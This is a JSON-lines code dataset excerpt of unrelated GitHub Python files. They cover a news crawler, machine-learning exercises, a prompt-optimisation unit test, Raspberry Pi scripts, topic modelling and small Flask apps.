pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor()\n\n print('load data from db!')\n try:\n sql = \"SELECT news_content,news_id FROM newslist\" \n print(sql)\n cur.execute(sql)\n result = cur.fetchall()\n print('load data finished!')\n except Exception :print(\"發生異常 in select from db\")\n \n need_to_del=[] \n for one_news in result:\n print(str(one_news[1])+\" : \"+str(len(one_news[0])))\n if(len(one_news[0])<15):\n need_to_del.append(one_news[1])\n print(\"need to delete: \"+str(need_to_del))\n\ndef send_to_db(news_topics):\n idx = 0\n for news_topic in news_topics:\n print('News topic : {}'.format(news_topic))\n links = crawl_news_links(url, news_topic)\n data_list = news_parser(links)\n data_list = cheacker_from_db(news_topics_ch[idx], data_list)\n save_to_db(news_topic, data_list) \n idx = idx + 1\n \nif __name__ == \"__main__\":\n\n base_url = \"https://tw.news.yahoo.com\"\n\n #news_topics =['all_topic', 'technology', 'sports', 'finance', 'politics', 'entertainment', 'society', 'health', 'travel', 'world']\n news_topics =['technology', 'sports', 'finance', 'politics', 'entertainment','health']\n news_topics_ch =['科技', '運動', '財經', '政治', '娛樂', '健康']\n #news_topics =['technology']\n #news_topics_ch =['科技']\n\n\n url = \"https://tw.news.yahoo.com/{}/archive\"\n archive = 'https://tw.news.yahoo.com/archive' #各家新聞\n \n \n print('connect to :' + ip)\n #blank_content_checker_db()\n #send_to_db(news_topics)\n \n idx=0\n for news_topic in news_topics:\n print('News topic : {}'.format(news_topic))\n links = crawl_news_links(url, news_topic)\n data_list = news_parser(links)\n data_list = cheacker_from_db(news_topics_ch[idx], data_list)\n save_to_db(news_topic, data_list) \n idx = idx + 1\n \n","repo_name":"Alvin1216/News_Crawler","sub_path":"20191209_crawler_old.py","file_name":"20191209_crawler_old.py","file_ext":"py","file_size_in_byte":8275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42613354027","text":"'''Notion of gradient and gradient descent in machine learning'''\n\n\nimport numpy as np\nfrom tools import is_vector_valid, is_theta_valid, add_intercept\n\n\ndef simple_gradient(x, y, theta):\n \"\"\"Computes a gradient vector from three non-empty numpy.array, without any for loop.\n The three arrays must have compatible shapes.\n Args:\n x: has to be a numpy.array, a matrix of shape m * 1.\n y: has to be a numpy.array, a vector of shape m * 1.\n theta: has to be a numpy.array, a 2 * 1 vector.\n Return:\n The gradient as a numpy.ndarray, a vector of dimension 2 * 1.\n None if x, y, or theta is an empty numpy.ndarray.\n None if x, y and theta do not have compatible dimensions.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n if not is_vector_valid(x) or not is_vector_valid(y) or not is_theta_valid(theta):\n return None\n if x.size != y.size:\n return None\n x_p = add_intercept(x)\n res = np.zeros(theta.shape)\n res = (x_p.T @ ((x_p @ theta) - y))\n return res / y.size\n\n\nif __name__ == \"__main__\":\n x = np.array([12.4956442, 21.5007972, 31.5527382,\n 48.9145838, 57.5088733]).reshape((-1, 1))\n y = np.array([37.4013816, 36.1473236, 45.7655287,\n 46.6793434, 59.5585554]).reshape((-1, 1))\n # Example 0:\n theta1 = np.array([2, 0.7]).reshape((-1, 1))\n print(repr(simple_gradient(x, y, theta1)))\n # Output:\n # array([[-19.0342574], [-586.66875564]])\n # Example 1:\n theta2 = np.array([1, -0.4]).reshape((-1, 1))\n print(repr(simple_gradient(x, y, theta2)))\n # Output:\n # array([[-57.86823748], [-2230.12297889]])","repo_name":"ababoum/42_ml_pool","sub_path":"module01/ex01/vec_gradient.py","file_name":"vec_gradient.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7832547172","text":"import unittest\nimport sys \nimport pdb \n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm \n\nimport transformers\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nimport magic_words\nfrom magic_words import easy_gcg_qa, easy_gcg_qa_ids\n\nclass TestEasyGCG(unittest.TestCase): \n @classmethod \n def setUpClass(cls):\n \"\"\"This is run once before all tests in this class. \n \"\"\"\n print(\"\\n=======================================\")\n print(\"==== Setting up TestEasyGCG class =====\")\n print(\"=======================================\")\n\n # Initialize a tokenizer and model\n cls.model_name = \"tiiuae/falcon-40b\"\n\n cls.tokenizer = AutoTokenizer.from_pretrained(cls.model_name, padding_side=\"left\")\n cls.tokenizer.pad_token = cls.tokenizer.eos_token\n\n cls.pipeline = transformers.pipeline(\n \"text-generation\",\n model=cls.model_name,\n tokenizer=cls.tokenizer,\n torch_dtype=torch.bfloat16,\n trust_remote_code=True,\n device_map=\"auto\",\n )\n\n cls.model = cls.pipeline.model\n cls.model.eval()\n\n cls.device = cls.model.device\n\n print(\"Model device: \", cls.device)\n\n def setUp(self):\n \"\"\" This is run before every single individual test method.\n \"\"\"\n ...\n\n def tearDown(self): \n \"\"\"This is run after every single individual test method. \n \"\"\"\n ...\n\n\n #####################\n ### MESSAGE TESTS ###\n #####################\n\n def test_run(self): \n print(\"Testing `easy_gcg()` on a simple example.\")\n question_str = \"What is the meaning of life? \"\n answer_str = \"42\"\n\n num_tokens = 10\n top_k = 128\n max_iters = 34 \n batch_size = 768\n max_parallel = 101\n\n prompt_ids = easy_gcg_qa(question_str,\n answer_str,\n num_tokens,\n self.model,\n self.tokenizer,\n top_k,\n batch_size=batch_size,\n num_iters=max_iters,\n max_parallel=max_parallel,\n blacklist=[]) # just to test the blacklist\n\n print(\"Best prompt: \", prompt_ids)\n print(\"Decoded prompt: \", self.tokenizer.batch_decode(prompt_ids))\n \n\n\n\n\n\n\n\n","repo_name":"amanb2000/Magic_Words","sub_path":"tests/test_easy_gcg.py","file_name":"test_easy_gcg.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"70393551873","text":"# PYTHON'DA COMPREHENSİONS -- FOR - WHİLE DÖNGÜLERİNE ALTERNATİF\n\n\nfrom unittest import result\n\n\nnumbers = [] # Boş bir liste tanımladık. \nfor x in range(10):\n numbers.append(x) # Bu listeye sıfırdan 10'a kadar olan sayıları ekledik. \nprint(numbers)\n\nnumbers1 = [y for y in range(10)] # Yukarıdaki işlemin daha kısa bir şekilde yapılması.\nprint(numbers1)\n\nfor z in range(10): # elemanları tek tek yazdırmak için for döngüsünü kullandık.\n print(z**2)\n \nnumbers2 = [z**2 for z in range(10)] # elemanları bir liste haline getirdik.\nprint(numbers2)\n\nnumbers3 = [t*t for t in range(10) if t % 3 == 0]\nprint(numbers3)\n\n\nmyString = \"Hello\"\nmyList = []\n\nfor letter in myString:\n myList.append(letter)\nprint(myList)\n\n\nmyList = [letter for letter in myString]\nprint(myList)\n\nyears = [1983, 1999, 1956, 1986]\n\nages = [2022-year for year in years ]\nprint(ages)\n\nresults = [x if x%2 == 0 else 'tek' for x in range(10)]\nprint(results)\n\nresult = []\nfor a in range(3):\n for b in range(3):\n result.append((a,b))\n \nprint(result)\n\nnumbers4 = [(x,y) for x in range(3) for y in range(3)]\nprint(numbers4)","repo_name":"fatihakblt/Python","sub_path":"List_comprehensions.py","file_name":"List_comprehensions.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41344287508","text":"\"\"\"\n1220. Magnetic\n210126 Solution\n1. 전치행렬 구함\n2. for문으로 1,2 값만 빼냄\n3. 1의 값은 스택에 담고 2일때 count++\n\"\"\"\n\nfor tc_num in range(10):\n rec_len = int(input())\n arr = [[] for _ in range(rec_len)]\n N = \"1\"\n S = \"2\"\n for i in range(rec_len):\n for index, num in enumerate(input().split()):\n arr[index].append(num)\n\n count = 0\n for array in arr:\n value_list = []\n for num in array:\n if num == N:\n value_list.append(num)\n elif num == S:\n if len(value_list):\n value_list = []\n count += 1\n print(f\"#{tc_num+1} {count}\")\n\n\n\"\"\"\n삽질 기록\n1. 일일이 다 swap하려고 시도함\n2. 한 줄 끝날 때 value_list 초기화 안해줌\n\"\"\"\n","repo_name":"devejs/Algorithm","sub_path":"SWEA/swea_1220_python.py","file_name":"swea_1220_python.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41021837120","text":"import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pathos.threading import ThreadPool as Pool\n\ndef yearly_arrays(vt,year,sample_size=2000):\n if (vt==1) or (vt==2) or (vt==6) or (vt==9):\n th=format(0.90, \".2f\")\n if (vt==3):\n th=format(0.85, \".2f\")\n if (vt==4) or (vt==13):\n th=format(0.75, \".2f\")\n if (vt==5) or (vt==16) or (vt==17):\n th=format(0.70, \".2f\")\n \n th_str = str(th)\n \n fol='/home/vanoorschot/work/fransje/scripts/LAI_FCOVER/fittings/fitting_1km/final'\n f = xr.open_dataset(f'{fol}/fc_lai_data/fc_lai_{year}_unst.nc')\n lc = xr.open_dataset(f'{fol}/esacci_masked/esacci_unst_{vt}_{th}.nc')\n \n lc_ar = lc[f'{vt}']\n n = np.where(~np.isnan(lc_ar))\n \n lat_ar = np.array([])\n lon_ar = np.array([])\n fc_ar = np.array([])\n lai_ar = np.array([])\n for k in range(36):\n n_sel = np.random.choice(n[0],sample_size,replace=False)\n fc_val = f.FCOVER[k,n_sel].values\n lai_val = f.LAI[k,n_sel].values\n lat_val = f.lat[n_sel].values\n lon_val = f.lon[n_sel].values\n fc_ar = np.concatenate([fc_ar, fc_val])\n lai_ar = np.concatenate([lai_ar, lai_val])\n lat_ar = np.concatenate([lat_ar,lat_val])\n lon_ar = np.concatenate([lon_ar,lon_val])\n\n # remove negative points & NAN points\n a = np.where(fc_ar<0)[0]\n b = np.where(lai_ar<0)[0]\n c = np.where(np.isnan(fc_ar))[0]\n d = np.where(np.isnan(lai_ar))[0]\n ab = np.concatenate([a,b,c,d])\n ab = np.sort(ab)\n ab = np.unique(ab)\n fc_ar = np.delete(fc_ar,ab)\n lai_ar = np.delete(lai_ar,ab)\n lat_ar = np.delete(lat_ar,ab)\n lon_ar = np.delete(lon_ar,ab)\n \n np.save(f'{fol}/output/yearly_arrays_2000/x_{year}_{vt}_{th}.npy',lai_ar)\n np.save(f'{fol}/output/yearly_arrays_2000/y_{year}_{vt}_{th}.npy',fc_ar)\n np.save(f'{fol}/output/yearly_arrays_2000/lat_{year}_{vt}_{th}.npy',lat_ar)\n np.save(f'{fol}/output/yearly_arrays_2000/lon_{year}_{vt}_{th}.npy',lon_ar)\n \n# make lists for parallel computation\nyear_l = [2013,2014,2015,2016,2017,2018,2019]#2006,2007,2008,2009,2010,2011,2012]\n# year_list = [1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019]\nvt_l = [1,2,3,4,5,6,9,13,16,17]\nvt_list = vt_l * (len(year_l))\nyear_list = year_l * len(vt_l)\nyear_list.sort()\nprint(vt_list)\nprint(year_list)\n\n#%% run function parallel\ndef run_function_parallel(vt_list=list,\n year_list=list,\n threads=200):\n if threads is None:\n pool = Pool()\n else:\n pool=Pool(nodes=threads)\n results = pool.map(yearly_arrays,\n vt_list,\n year_list,\n )\n return results\n\n# run function parallel -> do this with slurm\nrun_function_parallel(vt_list,year_list)\n","repo_name":"fvanoorschot/lai_fcover_fitting","sub_path":"final_arrays.py","file_name":"final_arrays.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31027674824","text":"import numpy as np\nimport pandas as pd\nfrom os import path\nimport re\nfrom string import punctuation, printable\n\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem.porter import PorterStemmer\n\nfrom sklearn.feature_extraction import text\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation as LDA\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom lemmatokenizer import LemmaTokenizer\n#from wordcloud import WordCloud\n\nimport matplotlib.pyplot as plt\n\n\n'''text_clf = Pipeline([('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MultinomialNB()),\n])\n\n\nparameters = {'vect__ngram_range': [(1, 1), (1, 2)],\n 'tfidf__use_idf': (True, False),\n 'clf__alpha': (1e-2, 1e-3),\n}'''\n\ndef get_unique_jobid(df, keeplist, byvar):\n ''' Return a dataframe with duplicate job_id's removed and the index reset.\n This will be used to create the cosine similarity matrix for job description.'''\n #jobvars = ['jobs_id', 'jobCompany', 'jobCategory', 'jobDescription', 'jobTitle']\n return df[keeplist].drop_duplicates(byvar).reset_index()\n\ndef _lower_strip(s):\n ''' Lowercase and strip punctuation from text before going into TF-IDF\n '''\n s = ''.join([i.lower() for i in s if i not in set(punctuation + '0123456789')])\n return s\n # print(s)\n\ndef preprocess_text(df, col):\n # df['new_text_col'] = df[col].apply(lambda x: _lower_strip(x))\n # return df['new_text_col']\n return df[col].apply(lambda x: _lower_strip(x))\n\ndef calculate_sparsity(mat):\n matrix_size = mat.shape[0]*mat.shape[1] # Number of possible interactions in the matrix\n num_nonzero = len(mat.nonzero()[0]) # Number of items interacted with\n sparsity = 100*(1 - (num_nonzero/float(matrix_size)))\n return sparsity\n\ndef print_top_words(model, feature_names, n_top_words):\n for topic_idx, topic in enumerate(model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndef make_lookup_dictionary(df, var):\n ''' Create a dictionary of job index and job variable. This will be used\n later to lookup the job information for the most similar jobs out of the\n similarity matrices.'''\n jobs_dict = {idx: title for idx, title in enumerate(df[var])}\n return jobs_dict\n\ndef get_top_jobs(cosine_matrix, jobs_dict, k):\n '''Sort the cosine similarity matrix from largest to smallest and store\n the results in a list of lists. The first item will be the job of interest.\n The remaining items will be the top k jobs associated with the job of interest.\n '''\n # top_jobs = cs_mat.argsort()[:, :-10:-1]\n top_jobs = cosine_matrix.argsort()[:, :-k - 1:-1]\n\n jobs_list = []\n for row in top_jobs:\n jobs_k = []\n for idx in row:\n jobs_k.append(jobs_dict[idx])\n jobs_list.append(jobs_k)\n return jobs_list\n\ndef softmax(v, temperature=1.0):\n '''\n A heuristic to convert arbitrary positive values into probabilities.\n See: https://en.wikipedia.org/wiki/Softmax_function\n '''\n expv = np.exp(v / temperature)\n s = np.sum(expv)\n return expv / s\n\ndef analyze_new_job(W, cluster_index):\n ''' Analyze a new job against a previously computed clustering and\n assign probabilities of belonging to each cluster.\n '''\n W = nmf.fit_transform(X)\n probs = softmax(W[article_index], temperature=0.01)\n for prob, label in zip(probs, hand_labels):\n print ('--> {:.2f}% {}'.format(prob * 100, label))\n print ()\n\ndef hand_label_topics(H, vocabulary):\n '''\n Print the most influential words of each latent topic, and prompt the user\n to label each topic. The user should use their humanness to figure out what\n each latent topic is capturing.\n '''\n hand_labels = []\n for i, row in enumerate(H):\n top_ngrams = np.argsort(row)[::-1][:20]\n print ('topic', i)\n print ('-->', ' '.join(vocabulary[top_ngrams]))\n label = raw_input('please label this topic: ')\n hand_labels.append(label)\n print ()\n return hand_labels\n\ndef create_topics(clean_text, description=None, n_gram_max=3, num_features=5000, n_topics=10, n_top_words=20):\n ''' Perform TF-IDF vectorization and feed the results into either NMF or LDA clustering.\n Print the vocabulary words associated with each cluster in order to verify that clustering\n is being performed as-expected.\n '''\n tfidf = TfidfVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, n_gram_max), max_features=num_features)\n\n tfidf_model = tfidf.fit_transform(clean_text)\n vocabulary = np.array(tfidf.get_feature_names())\n\n nmf = NMF(n_components=n_topics, max_iter=max_iterations, random_state=seed, alpha=0.1)\n lda = LDA(n_components=n_topics, learning_method='batch', random_state=seed)\n\n nmf_model = nmf.fit(tfidf_model)\n lda_model = lda.fit(tfidf_model)\n\n print(\"\\nTopics in NMF model using TF-IDF Vectorizer: {}\".format(description))\n print_top_words(nmf_model, vocabulary, n_top_words)\n\n print(\"\\nTopics in LDA model using TF-IDF Vectorizer: {}\".format(description))\n print_top_words(lda_model, vocabulary, n_top_words)\n\ndef fit_nmf_model(clean_text, n_gram_max=3, num_features=5000, n_topics=10, max_iterations=100, seed=1234):\n ''' Perform TF-IDF vectorization and feed the results into either NMF or LDA clustering.\n Print the vocabulary words associated with each cluster in order to verify that clustering\n is being performed as-expected.\n '''\n stop_words = text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n tfidf = TfidfVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, n_gram_max), max_features=num_features)\n\n tfidf_model = tfidf.fit_transform(clean_text)\n vocabulary = np.array(tfidf.get_feature_names())\n\n nmf = NMF(n_components=n_topics, max_iter=max_iterations, random_state=seed, alpha=0.1)\n W = nmf.fit_transform(tfidf_model)\n H = nmf.components_\n\n return vocabulary, W, H\n\ndef _pull_all_caps(text):\n s = ''.join([i for i in text if i not in set(punctuation + '0123456789')])\n keep_all_caps = ' '.join(word.lower() + word[1:] if not word.isupper() else word for word in s.split())\n return re.sub('[^A-Z]', '', keep_all_caps)\n\ndef pull_all_caps(df, col):\n return df[col].apply(lambda row: _pull_all_caps(row))\n # Keep words in all caps.\n\n s = ''.join([i.lower() for i in s if i not in set(punctuation + '0123456789')])\n keep_all_caps = ' '.join(word.lower() + word[1:] if not word.isupper() else word for word in string.split())\n\ndef get_stop_words():\n from sklearn.feature_extraction import text\n return text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n# def print_word_cloud(text):\n# # lower max_font_size\n# wordcloud = WordCloud(max_font_size=40).generate(text)\n# plt.figure()\n# plt.imshow(wordcloud, interpolation=\"bilinear\")\n# plt.axis(\"off\")\n\nif __name__ == '__main__':\n seed = 1234\n n_topics = 10\n n_top_words = 25\n max_iterations = 200\n\n df = pd.read_pickle('../data/posted_jobs.pkl')\n # appsdf = pd.read_pickle('../data/jobs_with_applicants.pkl')\n\n df = df.query(\"applicationCount == 0\")\n stop_words = text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n # create_topics(clean_descs)\n # create_topics(clean_titles, n_gram_max=2, num_features=500, n_topics=10, n_top_words=20)\n # create_topics(appsdf['major_text'], description = 'Job Majors', n_gram_max=2, num_features=500, n_topics=10, n_top_words=15)\n\n vocab, W_d, H_d = fit_nmf_model(df['desc_text'], n_gram_max=3, num_features=5000, n_topics=10)\n vocab, W_m, H_m = fit_nmf_model(df['major_text'], n_gram_max=2, num_features=500, n_topics=10)\n vocab, W_t, H_t = fit_nmf_model(df['title_text'], n_gram_max=2, num_features=500, n_topics=10)\n\n # ''' Fit the TF model to the text data '''\n # tf = CountVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, 3), max_features=5000)\n","repo_name":"dedstrom611/spotified_job_search","sub_path":"src/jobtext_processing.py","file_name":"jobtext_processing.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10849807285","text":"from setuptools import find_packages, setup\n\npackage_name = 'rpi_pc_talk'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=find_packages(exclude=['test']),\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='jlukas',\n maintainer_email='jlukas@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'publisher = rpi_pc_talk.publisher:main',\n 'subscriber = rpi_pc_talk.subscriber:main'\n ],\n },\n)\n","repo_name":"develtechmon/ROS2","sub_path":"rpi_pc_talk/src/rpi_pc_talk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21323459386","text":"import Adafruit_DHT\nimport time\n\n# Sensor should be set to Adafruit_DHT.DHT11,\n# Adafruit_DHT.DHT22, or Adafruit_DHT.AM2302.\nsensor = Adafruit_DHT.DHT11\n\n# Example using a Beaglebone Black with DHT sensor\n# connected to pin P8_11.\n#pin = 'P8_11'\n\n# Example using a Raspberry Pi with DHT sensor\n# connected to GPIO23.\npin = 14\n\nals = True\nwhile als:\n # Try to grab a sensor reading. Use the read_retry method which will retry up\n # to 15 times to get a sensor reading (waiting 2 seconds between each retry).\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n # Note that sometimes you won't get a reading and\n # the results will be null (because Linux can't\n # guarantee the timing of calls to read the sensor).\n # If this happens try again!\n\n\n if humidity is not None and temperature is not None:\n print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n else:\n print('Failed to get reading. Try again!!')\n time.sleep(60)\n","repo_name":"solacese/RaspberryPi-Solace-SCADA","sub_path":"publish/simpletest.py","file_name":"simpletest.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"75258792512","text":"import socket\nimport RPi.GPIO as GPIO\n\nvar=0\nhost = \"192.168.1.41\"\nport = 8080\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((host,port))\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(33,GPIO.OUT)\np = GPIO.PWM(33,50)\np.start(0)\n\nwhile(1):\n var=sock.recvfrom(1024)\n var=(float(var[0]))\n print (var)\n p.ChangeDutyCycle(var)\n\np.stop()\nGPIO.cleanup()\n\n","repo_name":"chinmayupadhyay1/IOT-IITK-test-codes-","sub_path":"from_pot_to_adno_to_RPi_to_LED.py","file_name":"from_pot_to_adno_to_RPi_to_LED.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42285916539","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 22 16:06:39 2019\n@author: Cumbe\n\"\"\"\n\nfrom firebase import firebase\nfrom flask import Flask, render_template, request\nfrom flask_bootstrap import Bootstrap\nfrom pyknow import * \n\napp = Flask(__name__)\nBootstrap(app)\n\ndef get_connection():\n data = firebase.FirebaseApplication('https://diagnostico-1f675.firebaseio.com/', None)\n return data\n \n\ndef get_Gripa():\n con = get_connection()\n dataset = con.get('/Enfermedades/0', None)\n return dataset\ndef get_GripaSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/0/Sintomas', None)\n return dataset\n\ndef get_Neumonia():\n con = get_connection()\n dataset = con.get('/Enfermedades/1', None)\n return dataset\ndef get_NeumoniaSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/1/Sintomas', None)\n return dataset\n\ndef get_Tuberculosis():\n con = get_connection()\n dataset = con.get('/Enfermedades/2', None)\n return dataset\ndef get_TuberculosisSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/2/Sintomas', None)\n return dataset\n\ndef get_Diabetes():\n con = get_connection()\n dataset = con.get('/Enfermedades/3', None)\n return dataset\ndef get_DiabetesSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/3/Sintomas', None)\n return dataset\n\ndef get_Gastritis():\n con = get_connection()\n dataset = con.get('/Enfermedades/4', None)\n return dataset\ndef get_GastritisSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/4/Sintomas', None)\n return dataset\n\nclass Sintoma(Fact):\n pass\n\nclass Enfermedad(Fact):\n pass\n\nGripa = get_Gripa()\nGripaSint = get_GripaSint()\n\ne100 = Gripa['100']\ns101 = GripaSint['101']\ns102 = GripaSint['102']\ns103 = GripaSint['103']\ns104 = GripaSint['104']\ns105 = GripaSint['105']\n\n\nNeumonia = get_Neumonia()\nNeumoniaSint = get_NeumoniaSint()\n\ne200 = Neumonia['200']\ns201 = NeumoniaSint['201']\ns202 = NeumoniaSint['202']\ns203 = NeumoniaSint['203']\ns204 = NeumoniaSint['204']\ns205 = NeumoniaSint['205']\n\nTuberculosis = get_Tuberculosis()\nTuberculosisSint = get_TuberculosisSint()\n\ne300 = Tuberculosis['300']\ns301 = TuberculosisSint['301']\ns302 = TuberculosisSint['302']\ns303 = TuberculosisSint['303']\ns304 = TuberculosisSint['304']\ns305 = TuberculosisSint['305']\n\nDiabetes = get_Diabetes()\nDiabetesSint = get_DiabetesSint()\n\ne400 = Diabetes['400']\ns401 = DiabetesSint['401']\ns402 = DiabetesSint['402']\ns403 = DiabetesSint['403']\ns404 = DiabetesSint['404']\ns405 = DiabetesSint['405']\n\nGastritis = get_Gastritis()\nGastritisSint = get_GastritisSint()\n\ne500 = Gastritis['500']\ns501 = GastritisSint['501']\ns502 = GastritisSint['502']\ns503 = GastritisSint['503']\ns504 = GastritisSint['504']\ns505 = GastritisSint['505']\n\nclass DiagnosticoEnfermedades(KnowledgeEngine):\n \n \n @Rule(Sintoma(descripcion= s101 and s102 or s103 or s104 or s105 or s504 or s304 or s202 or s303))\n def enfermedad_1(self):\n self.declare(Enfermedad(codigo=100, tipo=e100)) \n \n \n \n @Rule(Sintoma(descripcion= s201 and s202 or s203 or s204 or s205 or s301 or s504 or s303 or s102))\n def enfermedad_2(self):\n self.declare(Enfermedad(codigo=200, tipo=e200)) \n \n \n \n @Rule(Sintoma(descripcion= s301 and s302 or s303 or s304 or s305 or s504 or s104 or s201 or s202))\n def enfermedad_3(self):\n self.declare(Enfermedad(codigo=300, tipo=e300)) \n \n \n \n @Rule(Sintoma(descripcion= s401 and s402 or s403 or s404 or s405))\n def enfermedad_4(self):\n self.declare(Enfermedad(codigo=400, tipo=e400))\n \n \n \n @Rule(Sintoma(descripcion= s501 and s502 or s503 or s504 or s505 or s305 or s102 or s303 or s202))\n def enfermedad_5(self):\n self.declare(Enfermedad(codigo=500, tipo=e500)) \n \n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/diagnostico', methods=['POST'])\ndef Diagnostico():\n \n sinto1 = request.form['sint1']\n\n\n sinto2 = request.form['sint2']\n\n \n sinto3 = request.form['sint3']\n\n \n sinto4 = request.form['sint4']\n \n\n sinto5 = request.form['sint5']\n\n \n print('===============================================================================================')\n print(sinto1)\n print(sinto2)\n print(sinto3)\n print(sinto4)\n print(sinto5)\n print('===============================================================================================')\n \n watch('RULES', 'FACTS')\n diagnostico = DiagnosticoEnfermedades()\n diagnostico.reset()\n \n\n diagnostico.declare(Sintoma(descripcion=sinto1))\n diagnostico.declare(Sintoma(descripcion=sinto2))\n diagnostico.declare(Sintoma(descripcion=sinto3))\n diagnostico.declare(Sintoma(descripcion=sinto4))\n diagnostico.declare(Sintoma(descripcion=sinto5))\n\n \n diagnostico.run()\n enfermedad = diagnostico.facts\n\n for d in enfermedad:\n if (type(enfermedad[d]) == Enfermedad):\n tipo = enfermedad[d]['tipo']\n resultado = {'resul':tipo}\n \n\n return render_template('diagnostico.html', resultado=resultado)\n\n print(tipo)\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"steven243/cumbe","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37901466707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 00:35:10 2018\n\n@author: gaoyu\n\"\"\"\nfrom xlrd import open_workbook\nimport openpyxl\n\nwb = open_workbook('drug.xlsx')\nws=wb.sheet_by_index(0)\nnumber_of_cols = ws.ncols\nlst=[]\nfor i in range(number_of_cols-1):\n \n value = (ws.cell(0,i).value)\n lst.append(value)\n\nlst1=[]\nfor i in lst:\n name=''\n for j in i:\n if j.isupper() or j==' 'or j=='/':\n name=name+j\n else:\n break\n \n lst1.append(name)\nlst2=[]\nfor i in lst1:\n if i[len(i)-1]==' ':\n i=i[:-1]\n lst2.append(i)\n\nwb2 = openpyxl.load_workbook('drug.xlsx')\nws2=wb2.active\nws2.append(lst2)\nwb2.save('drug.xlsx')\nlst3=[]\nfor i in lst2:\n a=i.split('/')\n for j in a:\n lst3.append(j)\n \n \nlst4=[]\nfor i in lst3:\n if i in lst4:\n pass\n else:\n lst4.append(i)\n\nfile = open(\"substance_name.txt\", \"w\")\nfile.close() \nfor i in lst4:\n with open(\"substance_name.txt\", \"a\") as text_file:\n text_file.write(i+';')\n\n","repo_name":"MandyGaoGao/web-scrap-med-","sub_path":"3.3.1)active substance.py","file_name":"3.3.1)active substance.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32820567899","text":"from flask import Flask\nfrom faker import Faker\nimport requests\nimport csv\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"Hello, World!\"\n\n\n@app.route('/requirements/')\ndef req():\n with open('requirements.txt') as file:\n text = file.read()\n return f'{text}'\n\n\n@app.route('/generate-users/')\ndef users():\n f = Faker()\n user = []\n for i in range(100):\n name = f.name()\n mail = \"\".join(name.split()) + \"@mail.com\"\n user_name = name + \" : \" + mail.lower()\n user.append(user_name)\n\n return 